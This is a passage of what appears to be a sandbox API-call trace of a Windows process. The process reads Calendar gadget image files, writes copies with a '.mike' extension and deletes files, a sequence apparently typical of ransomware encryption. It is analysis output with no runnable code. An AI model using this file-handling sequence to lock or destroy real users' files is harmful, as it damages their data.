(dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.309] GetFileType (hFile=0x284) returned 0x1 [0131.309] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0131.309] WriteFile (in: hFile=0x284, lpBuffer=0x210e8d8*, nNumberOfBytesToWrite=0x560, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x210e8d8*, lpNumberOfBytesWritten=0x2af074*=0x560, lpOverlapped=0x0) returned 1 [0131.310] CloseHandle (hObject=0x284) returned 1 [0131.310] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.310] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.310] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.310] GetFileType (hFile=0x284) returned 0x1 [0131.310] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.310] GetFileType (hFile=0x284) returned 0x1 [0131.311] WriteFile (in: hFile=0x284, lpBuffer=0x2111b18*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x2111b18*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.311] CloseHandle (hObject=0x284) returned 1 [0131.311] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.311] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.311] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.311] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178d8d40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178d8d40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178feea0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x780)) returned 1 [0131.311] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.311] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.312] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.312] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2113328 | out: lpFileInformation=0x2113328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178d8d40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178d8d40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178feea0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x780)) returned 1 [0131.312] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.312] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.312] SetFileAttributesW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", dwFileAttributes=0x80) returned 0 [0131.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aebc8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.313] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af028) returned 1 [0131.313] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0a4 | out: lpFileInformation=0x2af0a4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178d8d40, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178d8d40, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x178feea0, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x780)) returned 1 [0131.313] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af024) returned 1 [0131.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", nBufferLength=0x105, lpBuffer=0x2aeba4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png", lpFilePart=0x0) returned 0x51 [0131.313] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", nBufferLength=0x105, lpBuffer=0x2aebd0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike", lpFilePart=0x0) returned 0x56 [0131.313] DeleteFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-dock.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-dock.png.mike")) returned 1 [0131.314] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.314] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.314] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aebe0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.314] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0d4) returned 1 [0131.314] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0131.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf10) returned 1 [0131.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aeb18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af00c) returned 1 [0131.316] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.316] GetFileType (hFile=0x284) returned 0x1 [0131.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af008) returned 1 [0131.316] GetFileType (hFile=0x284) returned 0x1 [0131.316] CloseHandle (hObject=0x284) returned 1 [0131.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec64, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.316] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.316] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec14, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0131.316] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af168) returned 1 [0131.316] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184 | out: lpFreeBytesAvailableToCaller=0x2af194, lpTotalNumberOfBytes=0x2af18c, lpTotalNumberOfFreeBytes=0x2af184) returned 1 [0131.316] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af164) returned 1 [0131.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.317] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), fInfoLevelId=0x0, lpFileInformation=0x2115c04 | out: lpFileInformation=0x2115c04*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0131.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0131.317] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), fInfoLevelId=0x0, lpFileInformation=0x2115f50 | out: lpFileInformation=0x2115f50*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0131.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.317] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.317] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.317] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec70, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec68, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.317] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aebf4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aebf8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af058) returned 1 [0131.318] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0d4 | out: lpFileInformation=0x2af0d4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0131.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af054) returned 1 [0131.318] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.318] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.318] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.318] GetFileType (hFile=0x284) returned 0x1 [0131.318] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.318] GetFileType (hFile=0x284) returned 0x1 [0131.318] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x0 [0131.318] WriteFile (in: hFile=0x284, lpBuffer=0x2116f04*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x2116f04*, lpNumberOfBytesWritten=0x2af074*=0x220, lpOverlapped=0x0) returned 1 [0131.319] CloseHandle (hObject=0x284) returned 1 [0131.319] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0a0) returned 1 [0131.319] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), fInfoLevelId=0x0, lpFileInformation=0x21169c4 | out: lpFileInformation=0x21169c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7e9776a, ftCreationTime.dwHighDateTime=0x1ca0404, ftLastAccessTime.dwLowDateTime=0xb7e9776a, ftLastAccessTime.dwHighDateTime=0x1ca0404, ftLastWriteTime.dwLowDateTime=0xb3769c1c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x496)) returned 1 [0131.319] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af09c) returned 1 [0131.320] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aeaf0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.320] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aefe4) returned 1 [0131.320] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.320] GetFileType (hFile=0x284) returned 0x1 [0131.320] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aefe0) returned 1 [0131.320] GetFileType (hFile=0x284) returned 0x1 [0131.320] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af074*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af074*=0) returned 0x0 [0131.320] ReadFile (in: hFile=0x284, lpBuffer=0x2118048, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af080, lpOverlapped=0x0 | out: lpBuffer=0x2118048*, lpNumberOfBytesRead=0x2af080*=0x496, lpOverlapped=0x0) returned 1 [0131.322] CloseHandle (hObject=0x284) returned 1 [0131.322] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.322] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeff4) returned 1 [0131.322] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.322] GetFileType (hFile=0x284) returned 0x1 [0131.322] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff0) returned 1 [0131.322] GetFileType (hFile=0x284) returned 0x1 [0131.322] SetFilePointer (in: hFile=0x284, lDistanceToMove=0, lpDistanceToMoveHigh=0x2aefc8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2aefc8*=0) returned 0x220 [0131.323] WriteFile (in: hFile=0x284, lpBuffer=0x211cab0*, nNumberOfBytesToWrite=0x4a0, lpNumberOfBytesWritten=0x2af074, lpOverlapped=0x0 | out: lpBuffer=0x211cab0*, lpNumberOfBytesWritten=0x2af074*=0x4a0, lpOverlapped=0x0) returned 1 [0131.323] CloseHandle (hObject=0x284) returned 1 [0131.323] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aeb08, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.323] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2aeffc) returned 1 [0131.323] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x284 [0131.323] GetFileType (hFile=0x284) returned 0x1 [0131.324] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2aeff8) returned 1 [0131.324] GetFileType (hFile=0x284) returned 0x1 [0131.325] WriteFile (in: hFile=0x284, lpBuffer=0x211fcf0*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0a4, lpOverlapped=0x0 | out: lpBuffer=0x211fcf0*, lpNumberOfBytesWritten=0x2af0a4*=0x20c, lpOverlapped=0x0) returned 1 [0131.325] CloseHandle (hObject=0x284) returned 1 [0131.325] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec90, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", lpFilePart=0x0) returned 0x57 [0131.326] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af0f0) returned 1 [0131.326] GetFileAttributesExW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\calendar.gadget\\images\\bg-today.png.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af16c | out: lpFileInformation=0x2af16c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x178feea0, ftCreationTime.dwHighDateTime=0x1d57a87, ftLastAccessTime.dwLowDateTime=0x178feea0, ftLastAccessTime.dwHighDateTime=0x1d57a87, ftLastWriteTime.dwLowDateTime=0x17925000, ftLastWriteTime.dwHighDateTime=0x1d57a87, nFileSizeHigh=0x0, nFileSizeLow=0x6c0)) returned 1 [0131.326] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af0ec) returned 1 [0131.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", nBufferLength=0x105, lpBuffer=0x2aec6c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png", lpFilePart=0x0) returned 0x52 [0131.326] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Calendar.Gadget\\images\\bg-today.png.mike", nBufferLength=0x105, lpBuffer=0x2aec8c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Windows 